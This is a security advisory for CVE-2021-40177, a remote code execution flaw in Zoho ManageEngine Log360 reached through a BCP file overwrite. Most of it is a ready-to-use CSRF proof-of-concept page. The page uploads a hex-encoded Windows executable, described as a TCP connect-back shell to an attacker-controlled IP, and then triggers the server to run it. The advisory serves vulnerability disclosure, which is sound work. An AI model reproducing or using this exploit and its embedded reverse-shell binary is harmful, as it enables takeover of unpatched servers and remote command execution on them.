Zoho ManageEngine Log360 - Remote Code Execution via BCP file overwrite
21 Nov 2021Zoho ManageEngine Log360 before Build 5225 allows execution of arbitrary code by overwriting BCP file.
Identifiers
- CVE-2021-40177
Affected versions
- 5.2.2
Affected Instance(s)
- /ChangeDBAPI.do?operation=writeBCP
Advisory URL
- https://www.manageengine.com/log-management/readme.html#Build%205225
Technical details
Zoho ManageEngine Log360 application exposes two endpoints, one of which can be abused to create/overwrite a BCP binary file in the product’s bin directory and another one to call it using Runtime.exec().
Impact:
The impact in this case is 1-click RCE, as the affected endpoints reqiured for exploitation lacks CSRF protection as well.
Exploitation Path:
- 
    Create a filename bcp.exe under <installation_dir>/Log360/bin/directory by sending the request to the affected endpoint.
- 
    As the exploitation in this case depends on the execution of overwritten binary, we can use the endpoint /ChangeDBAPI.do?operation=checkBCPwhich checks the existence ofBCP.exeandBCP.rllfile and executes theBCP.exe. This can be observed in the following screenshot. 
Exploitation:
Following POC code can be triggered to save the malicious bcp.exe file under <installation_dir>/Log360/bin/ folder and further execute it by using checkBCP operation. The malicous POC code in this example, upon execution will execute a TCP connect back shell on attacker’s controlled IP address.
<html>
  <body>
    <script>
      function overwrite_bcp()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http:\/\/192.168.0.196:8095\/ChangeDBAPI.do?operation=writeBCP", true);
        xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded");
        xhr.withCredentials = true;
        var body = "bcpexe=4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000504500004c010300869ebc600000000000000000e00022000b013000000a0000000800000000000022290000002000000040000000004000002000000002000004000000000000000400000000000000008000000002000000000000030040850000100000100000000010000010000000000000100000000000000000000000d02800004f00000000400000ac04000000000000000000000000000000000000006000000c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002e746578740000002809000000200000000a000000020000000000000000000000000000200000602e72737263000000ac0400000040000000060000000c0000000000000000000000000000400000402e72656c6f6300000c00000000600000000200000012000000000000000000000000000040000042000000000000000000000000000000000429000000000000480000000200050004220000cc06000001000000010000060000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001b3003000901000001000011007201000070205c110000730400000a0a00066f0500000a0b0007730600000a0c0007730700000a8001000004730800000a0d730900000a130411046f0a00000a721d0000706f0b00000a0011046f0a00000a176f0c00000a0011046f0a00000a166f0d00000a0011046f0a00000a176f0e00000a0011046f0a00000a176f0f00000a0011046f0a00000a176f1000000a00110414fe0602000006731100000a6f1200000a0011046f1300000a2611046f1400000a002b2b0009086f1500000a6f1600000a2611046f1700000a096f1800000a000916096f1900000a6f1a00000a26001713052bd0082c07086f1b00000a00dc072c07076f1b00000a00dc062c07066f1b00000a00dc0000000128000002002100c7e8000b0000000002001900daf3000b0000000002001100edfe000b000000001b300200490000000200001100730800000a0a036f1c00000a281d00000a16fe010b072c2f000006036f1c00000a6f1600000a267e01000004066f1800000a007e010000046f1e00000a0000de050c0000de00002a0000000110000000001a00284200050d0000012202281f00000a002a00000042534a4201000100000000000c00000076342e302e33303331390000000005006c00000034020000237e0000a00200002403000023537472696e677300000000c40500003000000023555300f405000010000000234755494400000004060000c800000023426c6f620000000000000002000001571502000900000000fa0133001600000100000014000000020000000100000003000000030000001f000000030000000200000001000000020000000000f80001000000000006009f002d020600bf002d0206008b001a020f004d020000060099024c010600d5010a000a00a002860206003d010a00060081010a0006009901f7020a007e021a020a005c021a02060058014c010a002c0186020a0070011a020a00bc011a0206008e010a000600ef010a00060044004c01060002014c0100000000010000000000010001000100100044011a011500010001001100e201830050200000000096005301870001009021000000009100a7018d000200f821000000008618140206000400000001007202000001007702000002007b00090014020100110014020600190014020a00390014021e0039003a012400490014022900310014022900510014020600590014020600590062012f007900500034007900030339007900dd0039007900dc0239007900c20239007900fa013900810014023e005900260044005900aa024a0059005d000600890068004e0051003d0052005900b0025800910071005d0051000f0162005100f1006600990083000600610014004e00a100160375009100090106002900140206002e000b0094002e0013009d002e001b00bc0010006d00048000000000000000000000000000000000260100000400000000000000000000007a001d00000000000400000000000000000000007a004c01000000000000003c4d6f64756c653e0053797374656d2e494f006765745f44617461006d73636f726c6962006164645f4f757470757444617461526563656976656400417070656e640049446973706f7361626c65007365745f46696c654e616d6500426567696e4f7574707574526561644c696e650057726974654c696e65006f75744c696e6500446973706f73650044656275676761626c6541747472696275746500436f6d70696c6174696f6e52656c61786174696f6e734174747269627574650052756e74696d65436f6d7061746962696c697479417474726962757465007365745f5573655368656c6c457865637574650052656d6f7665007368656c6c2e65786500537472696e6700466c757368006765745f4c656e67746800436f6e6e6563744261636b007368656c6c004e6574776f726b53747265616d0047657453747265616d0050726f6772616d0053797374656d004d61696e00457863657074696f6e006765745f5374617274496e666f0050726f636573735374617274496e666f0053747265616d526561646572005465787452656164657200537472696e674275696c64657200436d644f75747075744461746148616e646c6572004461746152656365697665644576656e7448616e646c65720053747265616d5772697465720073747265616d5772697465720054657874577269746572007365745f52656469726563745374616e646172644572726f72002e63746f720053797374656d2e446961676e6f73746963730053797374656d2e52756e74696d652e436f6d70696c6572536572766963657300446562756767696e674d6f646573004461746152656365697665644576656e744172677300617267730073656e64696e6750726f636573730053797374656d2e4e65742e536f636b657473004f626a65637400546370436c69656e74005374617274006765745f5374616e64617264496e707574007365745f52656469726563745374616e64617264496e707574007365745f52656469726563745374616e646172644f75747075740053797374656d2e54657874007365745f4372656174654e6f57696e646f770049734e756c6c4f72456d70747900001b3100390032002e003100360038002e0030002e00310030003300000f63006d0064002e0065007800650000000000c0dd5677a5e1b6438623308e7640e211000420010108032000010520010111110d0706121d122112251229122d02052002010e080420001239052001011221042000123d042001010e0420010102052002011c18052001011241032000020320000e05200112290e0420001219042001011c03200008062002122908080707031229021235040001020e08b77a5c561934e08903061219050001011d0e060002011c12310801000800000000001e01000100540216577261704e6f6e457863657074696f6e5468726f777301080100070100000000000000f828000000000000000000001229000000200000000000000000000000000000000000000000000004290000000000000000000000005f436f724578654d61696e006d73636f7265652e646c6c0000000000ff250020400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200100000002000008018000000500000800000000000000000000000000000010001000000380000800000000000000000000000000000010000000000800000000000000000000000000000000000010001000000680000800000000000000000000000000000010000000000ac020000904000001c02000000000000000000001c0234000000560053005f00560045005200530049004f004e005f0049004e0046004f0000000000bd04effe00000100000000000000000000000000000000003f000000000000000400000001000000000000000000000000000000440000000100560061007200460069006c00650049006e0066006f00000000002400040000005400720061006e0073006c006100740069006f006e00000000000000b0047c010000010053007400720069006e006700460069006c00650049006e0066006f0000005801000001003000300030003000300034006200300000002c0002000100460069006c0065004400650073006300720069007000740069006f006e000000000020000000300008000100460069006c006500560065007200730069006f006e000000000030002e0030002e0030002e003000000024000200010049006e007400650072006e0061006c004e0061006d00650000003f0000002800020001004c006500670061006c0043006f0070007900720069006700680074000000200000002c00020001004f0072006900670069006e0061006c00460069006c0065006e0061006d00650000003f000000340008000100500072006f006400750063007400560065007200730069006f006e00000030002e0030002e0030002e003000000038000800010041007300730065006d0062006c0079002000560065007200730069006f006e00000030002e0030002e0030002e0030000000bc420000ea0100000000000000000000efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d3822207374616e64616c6f6e653d22796573223f3e0d0a0d0a3c617373656d626c7920786d6c6e733d2275726e3a736368656d61732d6d6963726f736f66742d636f6d3a61736d2e763122206d616e696665737456657273696f6e3d22312e30223e0d0a20203c617373656d626c794964656e746974792076657273696f6e3d22312e302e302e3022206e616d653d224d794170706c69636174696f6e2e617070222f3e0d0a20203c7472757374496e666f20786d6c6e733d2275726e3a736368656d61732d6d6963726f736f66742d636f6d3a61736d2e7632223e0d0a202020203c73656375726974793e0d0a2020202020203c72657175657374656450726976696c6567657320786d6c6e733d2275726e3a736368656d61732d6d6963726f736f66742d636f6d3a61736d2e7633223e0d0a20202020202020203c726571756573746564457865637574696f6e4c6576656c206c6576656c3d226173496e766f6b6572222075694163636573733d2266616c7365222f3e0d0a2020202020203c2f72657175657374656450726976696c656765733e0d0a202020203c2f73656375726974793e0d0a20203c2f7472757374496e666f3e0d0a3c2f617373656d626c793e00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000c000000243900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000&bcprll=61616161616161";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
      function sleep(ms) {
            return new Promise(resolve => setTimeout(resolve, ms));
        }
      function trigger_bcp()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http:\/\/192.168.0.196:8095\/ChangeDBAPI.do", true);
        xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded");
        xhr.withCredentials = true;
        var body = "operation=checkBCP";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
      async function exploit() {
            console.log("[+] Overwriting BCP file");
            overwrite_bcp();
            await sleep(3000);
            console.log("[+] Executing bcp.exe");
            trigger_bcp();
        }
      exploit();
    </script>
  </body>
</html>
As can be seen in the following screenshot, one can execute arbitrary code on the affected version of Log360 instances.


Recommendation:
As the bulk copy program is a utility sotfware from microsoft, it is recommended to validate binary signature validation before executing it.